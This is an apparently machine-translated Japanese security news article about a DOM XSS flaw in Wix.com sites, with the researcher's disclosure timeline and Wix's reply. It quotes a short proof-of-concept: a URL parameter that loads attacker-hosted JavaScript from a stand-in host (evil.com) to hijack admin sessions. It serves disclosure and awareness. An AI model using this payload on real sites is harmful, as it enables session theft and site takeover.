>> サイバーニュース >Wix.comプラットフォームでXSSバグが見つかりました, オープンソースのWordPressライブラリに基づいて構築
サイバーニュース

Wix.comプラットフォームでXSSバグが見つかりました, オープンソースのWordPressライブラリに基づいて構築

  |  Last Update:  |  0 コメントコメント  

脆弱性-stforum

Wixについて聞いたことがありますか(.)com?

Wix.comは、ユーザーが会社のオンラインドラッグアンドドロップツールを使用してHTML5Webサイトとモバイルサイトを構築するために設計されたクラウドベースのWeb開発プラットフォームです。.

不運にも, 深刻なXSSバグがプラットフォームで発見され、現在何百万ものWebサイトとユーザーを危険にさらしています.

関連している: 侵害されたWordPressページを介したTeslaCryptスプレッド

Wix(.)comには深刻なXSSバグがあります, 研究者は言う

セキュリティ研究者によって報告されたように, このサービスは何百万ものウェブサイトをホストしています 87 百万人の登録ユーザー. 怖いのは、現在すべてのユーザーがこのXSSの脆弱性に陥りやすいことです。. 後者は、攻撃者がワームのように展開して管理者アカウントを乗っ取る可能性があります. これが行われると, 攻撃者は、侵害されたWebサイトを完全に制御できます。.

XSSの脆弱性は、ContrastSecurityのMattAustinによって開示されました。. 彼 書きました:

Wix.comには深刻なDOMXSSの脆弱性があり、攻撃者はWixでホストされているWebサイトを完全に制御できます。. Wixで作成されたサイトに単一のパラメータを追加するだけです, 攻撃者は、JavaScriptをロードして、ターゲットWebサイトの一部として実行させることができます。.

バグを引き起こすには、単純なコード行で十分です

攻撃は、wixから任意のURLに単純なリダイレクトコマンドを追加することによってのみトリガーできます(.)com. 結果は悪意のあるJavaScripにリダイレクトされます. 以下の例を参照してください:

  • 追加: ?ReactSource = https://evil.comからwix.comで作成された任意のサイトの任意のURL.
  • evil.comが/packages-bin/wixCodeInit/wixCodeInit.min.jsで悪意のあるファイルをホストしていることを確認してください

これらの単純なコード行は、攻撃者がJSが標的のWebサイトの一部としてロードおよびアクティブ化されていることを確認するのに十分です。, 研究者は説明します. 攻撃者は、管理セッションのCookieとリソースにアクセスすることもできます, 確かに非常に悪いシナリオ. セッションCookieが収集されるときはいつでも, 攻撃者はDOMXSSをiframeに自由に配置できます. これは、オペレーターが管理するWebサイトで悪意のあるコンテンツをホストするために行われます。.

成功すると, この攻撃はマルウェアの配布に利用できます, ウェブサイトの変更, 暗号通貨マイニング, アカウントの資格情報の変更, 等.

Wixは何と言いましたか?

wixとのコミュニケーションも(.)com, 研究者は以下の経験を共有しています:

10月 10: セキュリティ連絡先を要求するサポートチケットを作成します
10月 11: セキュリティ担当者を見つけるには、Twitterで@wixに連絡してください. 標準サポートを使用するように返信しました. 作成したチケットに詳細を記載. チケットページは機能しなくなりました. https://www.wix.com/support/html5/contact.
10月 14: Wixから「問題を調査しており、できるだけ早くフォローアップします」という標準の返信を受け取りました.
10月 20: 更新を要求するチケットに返信する. (応答なし)
10月 27: 更新の2番目の要求. (応答なし)

10月に 28, 研究者はついに、次のような回答を受け取りました。

連絡しようとしたグループ (安全) 存在しない可能性があります, または、グループにメッセージを投稿する権限がない可能性があります.

それにもかかわらず, Wix Avishai AbrahamiのCEOは、プラットフォームの特定の側面がWordPressオープンソースライブラリに基づいていることを最終的に認めました. 彼は、改善されたものはすべてコミュニティにリリースされたと主張しています, ZDNetレポート.

ミレーナ・ディミトロワ

プロジェクトの開始以来SensorsTechForumに所属しているインスピレーションを得たライター兼コンテンツマネージャー. の専門家 10+ 魅力的なコンテンツの作成における長年の経験. ユーザーのプライバシーとマルウェア開発に焦点を当てています, 彼女はサイバーセキュリティが中心的な役割を果たす世界を強く信じています. 常識が意味をなさない場合, 彼女はメモを取るためにそこにいます. それらのメモは後で記事になる可能性があります! Milena@Milenyimをフォローする

その他の投稿

フォローしてください:
ツイッター

関連記事:
  1. 10月のランサムウェアの削除 Oct ランサムウェア Oct は、...
  2. 6 XSS攻撃から保護するためのサイバーセキュリティ戦術 クロスサイトスクリプティング (XSS) 軽く取るものは何もない. 同時に...
  3. XSSバグが見つかりました (および修正済み) Photos.Facebook.comで 私たちは皆Facebookが大好きですが、どれだけ安全か知っていますか...
  4. 攻撃で悪用されたWooCommerceWordPressプラグインの放棄されたカート WooCommerce プラグイン用の放棄されたカートのパッチが適用されていないバージョン...
  5. Yahooはもう1つの恐ろしいXSSバグを修正しました セキュリティの専門家は、多国籍企業が...
  6. Googleリリース 2 XSSから保護するための新しい開発ツール Google は開発者向けに 2 つの新しいツールをリリースしました...
  7. オールインワンSEOパックWordPressプラグインの脆弱性により、XSS攻撃が可能になる可能性があります All in One SEO Pack は、最も優れた SEO パックの 1 つです。.
  8. 注意して使用してください: 7 の一般的で危険なオンラインの場所 2019 数年前, の 2016, 私たちは分析することにしました...

コメントを残す

あなたのメールアドレスが公開されることはありません. 必須フィールドは、マークされています *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our プライバシーポリシー.
同意します